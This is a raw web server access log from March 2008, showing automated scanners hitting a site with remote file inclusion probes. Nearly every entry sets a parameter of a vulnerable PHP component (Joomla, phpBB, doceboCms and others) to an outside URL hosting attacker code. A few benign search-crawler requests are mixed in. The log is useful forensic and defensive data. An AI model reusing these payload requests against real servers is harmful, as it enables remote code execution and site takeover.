195.117.237.134 - - [02/Mar/2008:07:37:30 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:38:27 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:38:28 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:38:28 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:38:50 -0800] "GET /logs/access_080208.log//modules/TotalCalendar/about.php?inc_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:07:38:58 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.27.20 - - [02/Mar/2008:07:39:29 -0800] "GET /tmp/?D=D HTTP/1.0" 200 2164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:07:39:37 -0800] "GET /logs/access.log/index.php?pagina=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:41:02 -0800] "GET /errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:41:02 -0800] "GET /logs/errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:07:41:06 -0800] "GET /logs/access_080221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:07:41:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:41:25 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:41:25 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:41:56 -0800] "GET /logs/access_080207.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.96.89 - - [02/Mar/2008:07:41:58 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.227.96.89 - - [02/Mar/2008:07:41:58 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:07:41:59 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:07:41:59 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:42:06 -0800] "GET //mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:07:42:18 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:07:42:19 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:07:42:19 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:07:42:19 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:07:42:23 -0800] "GET /logs/access_080201.log/claroline/tracking/userLog.php?rootSys=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:07:42:23 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.57.207 - - [02/Mar/2008:07:42:39 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.60 - - [02/Mar/2008:07:44:21 -0800] "GET /logs/access_080103.log HTTP/1.0" 200 448825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:44:55 -0800] "GET /logs/access_080106.log//auth/auth.php?phpbb_root_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:44:56 -0800] "GET //auth/auth.php?phpbb_root_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:44:57 -0800] "GET /logs//auth/auth.php?phpbb_root_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:07:45:44 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:07:45:44 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:07:45:45 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:07:45:58 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:45:59 -0800] "GET /logs/access_080107.log//auth/auth.php?phpbb_root_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.176 - - [02/Mar/2008:07:46:06 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:07:46:07 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.66.110 - - [02/Mar/2008:07:46:32 -0800] "GET /main.php?x=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.106.66.110 - - [02/Mar/2008:07:46:32 -0800] "GET /logs/main.php?x=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:07:46:41 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.35.14 - - [02/Mar/2008:07:46:54 -0800] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.contactoefectivo.com/mambots/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:07:46:57 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:07:46:58 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
205.134.252.251 - - [02/Mar/2008:07:46:58 -0800] "GET /logs/access_080122.log/index.php?x=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.251 - - [02/Mar/2008:07:46:58 -0800] "GET /index.php?x=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.251 - - [02/Mar/2008:07:46:58 -0800] "GET /logs/index.php?x=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:07:47:00 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:07:47:01 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:07:47:01 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:07:47:01 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:47:08 -0800] "GET /logs/access_080131.log//impex/ImpExData.php?systempath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:47:09 -0800] "GET //impex/ImpExData.php?systempath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:47:10 -0800] "GET /logs//impex/ImpExData.php?systempath=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:47:51 -0800] "GET /logs/access_080215.log//mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:47:51 -0800] "GET /logs//mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:07:48:00 -0800] "GET /logs/access_080122.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:07:48:00 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:07:48:00 -0800] "GET /logs/access_080118.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:48:06 -0800] "GET //atom.php5?page=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:48:06 -0800] "GET /logs//atom.php5?page=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:48:12 -0800] "GET /logs/access_080208.log//mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:07:48:28 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:07:48:31 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:07:50:02 -0800] "GET /logs/access_080117.log/index.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:07:50:11 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:07:50:11 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:50:32 -0800] "GET /logs/access_080122.log/errors.php?error=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:50:32 -0800] "GET /errors.php?error=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:50:32 -0800] "GET /logs/errors.php?error=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:07:50:35 -0800] "GET /logs/access_080119.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:07:50:36 -0800] "GET /logs/access_080119.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:07:51:17 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:07:51:33 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:07:51:34 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:07:51:37 -0800] "GET /logs/access_080120.log/index2.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:07:51:38 -0800] "GET /index2.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:07:51:39 -0800] "GET /logs/index2.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:07:53:06 -0800] "GET /classes/core/language.php?rootdir=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:07:53:06 -0800] "GET /logs/classes/core/language.php?rootdir=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
200.105.35.14 - - [02/Mar/2008:07:53:55 -0800] "GET /logs/access.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.contactoefectivo.com/mambots/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.226.120 - - [02/Mar/2008:07:54:03 -0800] "GET /logs/access_071224.log/!scanhttp://www.emailnotices.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.226.120 - - [02/Mar/2008:07:54:04 -0800] "GET /!scanhttp://www.emailnotices.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.226.120 - - [02/Mar/2008:07:54:05 -0800] "GET /logs/!scanhttp://www.emailnotices.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.226.120 - - [02/Mar/2008:07:54:11 -0800] "GET /logs/access_071225.log/!scanhttp://www.emailnotices.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:07:54:16 -0800] "GET /logs/access_080111.log/index2.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.97 - - [02/Mar/2008:07:54:38 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.224 - - [02/Mar/2008:07:56:25 -0800] "GET /tmp/sess_7ce90436de3fb5ffa8e3afddeb23e601 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:07:57:14 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:07:57:14 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.105.75.32 - - [02/Mar/2008:07:57:18 -0800] "GET /logs/access_080208.log/index.php?option=com_checkin&Itemid=&mosConfig_absolute_path=http://www.buztronics.com/mambots/search/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.105.75.32 - - [02/Mar/2008:07:57:18 -0800] "GET /index.php?option=com_checkin&Itemid=&mosConfig_absolute_path=http://www.buztronics.com/mambots/search/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.105.75.32 - - [02/Mar/2008:07:57:19 -0800] "GET /logs/index.php?option=com_checkin&Itemid=&mosConfig_absolute_path=http://www.buztronics.com/mambots/search/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:07:57:39 -0800] "GET /logs/access_080221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:07:57:39 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:07:58:57 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.10.85 - - [02/Mar/2008:07:59:07 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
85.25.10.85 - - [02/Mar/2008:07:59:12 -0800] "GET //components/com_facileforms/facileforms.frame.php?&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
89.174.96.241 - - [02/Mar/2008:07:59:24 -0800] "GET /logs/errors.php?error=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
89.174.96.241 - - [02/Mar/2008:07:59:24 -0800] "GET /errors.php?error=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
205.234.200.223 - - [02/Mar/2008:08:00:21 -0800] "GET /logs/access.log//main.php?pageURL=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [02/Mar/2008:08:00:21 -0800] "GET //main.php?pageURL=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [02/Mar/2008:08:00:21 -0800] "GET /logs//main.php?pageURL=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:00:24 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:00:28 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:00:35 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:00:36 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:00:36 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:00:37 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:00:39 -0800] "GET /logs/access_080221.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:08:01:05 -0800] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:08:01:16 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.79.234.84 - - [02/Mar/2008:08:01:20 -0800] "GET /logs/access.log//main.php?pageURL=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.234.84 - - [02/Mar/2008:08:01:20 -0800] "GET //main.php?pageURL=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.234.84 - - [02/Mar/2008:08:01:20 -0800] "GET /logs//main.php?pageURL=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
